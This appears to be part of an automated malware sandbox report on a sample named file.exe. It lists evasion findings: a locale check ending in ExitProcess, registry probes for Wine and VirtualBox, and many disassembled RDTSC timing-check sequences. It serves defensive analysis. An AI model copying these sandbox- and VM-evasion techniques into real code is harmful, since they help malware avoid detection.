                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D49BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-36496
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101E230 second address: 101E23D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5C20C5AC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C98E second address: 119C99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F5C2120954Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C99D second address: 119C9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C9A1 second address: 119C9B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5C2120954Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119CD7C second address: 119CDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F5C20C5AC51h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5C20C5AC49h 0x00000012 jmp 00007F5C20C5AC3Dh 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A0F47 second address: 11A0F4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A0F4E second address: 11A0FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 33252243h 0x0000000e mov edx, eax 0x00000010 push 00000003h 0x00000012 mov edi, dword ptr [ebp+122D1D16h] 0x00000018 mov dword ptr [ebp+122D3943h], esi 0x0000001e push 00000000h 0x00000020 cld 0x00000021 push 00000003h 0x00000023 mov ecx, eax 0x00000025 push C5C79288h 0x0000002a pushad 0x0000002b jnl 00007F5C20C5AC47h 0x00000031 js 00007F5C20C5AC38h 0x00000037 push eax 0x00000038 pop eax 0x00000039 popad 0x0000003a xor dword ptr [esp], 05C79288h 0x00000041 xor dword ptr [ebp+122D316Ch], edx 0x00000047 lea ebx, dword ptr [ebp+12456D62h] 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F5C20C5AC3Ah 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A102F second address: 11A1034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1034 second address: 11A105B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b je 00007F5C20C5AC3Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A115F second address: 11A1164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1164 second address: 11A11A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F5C20C5AC38h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 or dword ptr [ebp+122D27AEh], ebx 0x0000002e push 52473181h 0x00000033 pushad 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A12BB second address: 11A12BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A12BF second address: 11A12C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF381 second address: 11BF387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF387 second address: 11BF39F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5C20C5AC36h 0x00000008 jnp 00007F5C20C5AC36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F5C20C5AC36h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF65E second address: 11BF668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BFF61 second address: 11BFF83 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5C20C5AC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F5C20C5AC36h 0x00000014 jmp 00007F5C20C5AC3Eh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BFF83 second address: 11BFFA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C2120954Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F5C2120954Ah 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118CB50 second address: 118CB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118CB54 second address: 118CB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F5C21209546h 0x00000010 jmp 00007F5C2120954Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118CB6F second address: 118CB7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F5C20C5AC36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118CB7E second address: 118CBB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 jmp 00007F5C2120954Eh 0x0000000c popad 0x0000000d jc 00007F5C21209572h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5C21209558h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118CBB6 second address: 118CBBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C0BBF second address: 11C0BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3F6B second address: 11C3F75 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5C20C5AC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3F75 second address: 11C3F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F5C21209546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3F80 second address: 11C3F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F5C20C5AC3Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3F96 second address: 11C3F9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C2DDD second address: 11C2DF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5C20C5AC48h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3544 second address: 11C354B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C46A1 second address: 11C46AB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5C20C5AC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C604D second address: 11C6053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C6053 second address: 11C607A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F5C20C5AC47h 0x0000000c push ebx 0x0000000d jnl 00007F5C20C5AC36h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C607A second address: 11C608E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5C2120954Dh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C608E second address: 11C6092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBF13 second address: 11CBF2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5C21209556h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBF2E second address: 11CBF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007F5C20C5AC36h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBF42 second address: 11CBF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5C21209554h 0x0000000e jnc 00007F5C21209548h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11847A9 second address: 11847BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jg 00007F5C20C5AC36h 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11847BD second address: 11847D5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5C21209546h 0x00000008 jg 00007F5C21209546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007F5C21209546h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11847D5 second address: 11847D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11847D9 second address: 11847DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11847DF second address: 11847E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB460 second address: 11CB4A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C2120954Fh 0x00000007 jo 00007F5C2120954Eh 0x0000000d jnc 00007F5C21209546h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jmp 00007F5C21209552h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5C2120954Fh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB5EA second address: 11CB63D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC42h 0x00000007 jl 00007F5C20C5AC36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F5C20C5AC46h 0x00000014 jmp 00007F5C20C5AC49h 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007F5C20C5AC36h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB776 second address: 11CB79B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C2120954Ah 0x00000009 popad 0x0000000a jmp 00007F5C21209552h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBBDE second address: 11CBBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBBE4 second address: 11CBBFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C21209553h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBBFC second address: 11CBC34 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5C20C5AC51h 0x00000008 jbe 00007F5C20C5AC36h 0x0000000e jmp 00007F5C20C5AC45h 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5C20C5AC3Ah 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBDA8 second address: 11CBDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBDAC second address: 11CBDB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBDB0 second address: 11CBDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5C21209556h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CEC53 second address: 11CEC69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5C20C5AC42h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFB58 second address: 11CFB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFB5C second address: 11CFB71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFB71 second address: 11CFBB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F5C21209546h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebx 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F5C21209548h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D35BCh] 0x00000031 and esi, dword ptr [ebp+122D2B07h] 0x00000037 nop 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFBB0 second address: 11CFBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFBB4 second address: 11CFBC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 js 00007F5C21209554h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFBC6 second address: 11CFBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D00AF second address: 11D00BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0E72 second address: 11D0E78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2D33 second address: 11D2D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5C21209546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2D3D second address: 11D2D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2AEE second address: 11D2B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C2120954Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F5C21209551h 0x00000013 jmp 00007F5C2120954Bh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2D41 second address: 11D2D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2D4F second address: 11D2D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2D54 second address: 11D2DB6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F5C20C5AC44h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edi, dword ptr [ebp+122D27DFh] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F5C20C5AC38h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e pushad 0x0000002f mov ebx, 37196BD9h 0x00000034 mov dword ptr [ebp+122D2079h], edi 0x0000003a popad 0x0000003b push 00000000h 0x0000003d and esi, dword ptr [ebp+122D2BCBh] 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jns 00007F5C20C5AC36h 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2DB6 second address: 11D2DBC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2DBC second address: 11D2DD8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5C20C5AC41h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D427D second address: 11D4281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4281 second address: 11D42EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F5C20C5AC38h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D3456h] 0x0000002c sub esi, dword ptr [ebp+12458450h] 0x00000032 push 00000000h 0x00000034 js 00007F5C20C5AC3Ah 0x0000003a push eax 0x0000003b add esi, 511A3C79h 0x00000041 pop esi 0x00000042 push 00000000h 0x00000044 mov si, dx 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a jo 00007F5C20C5AC3Ch 0x00000050 jg 00007F5C20C5AC36h 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D42EE second address: 11D42F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4C78 second address: 11D4CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F5C20C5AC38h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov edi, 365837A8h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F5C20C5AC38h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 or dword ptr [ebp+122D3943h], eax 0x0000004a push 00000000h 0x0000004c call 00007F5C20C5AC44h 0x00000051 mov dword ptr [ebp+1245499Fh], edx 0x00000057 pop edi 0x00000058 xchg eax, ebx 0x00000059 push ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D9A9E second address: 11D9AA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DBB1C second address: 11DBB21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCB02 second address: 11DCB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, 79BD47A4h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F5C21209548h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e jne 00007F5C21209546h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F5C21209559h 0x0000003c rdtsc
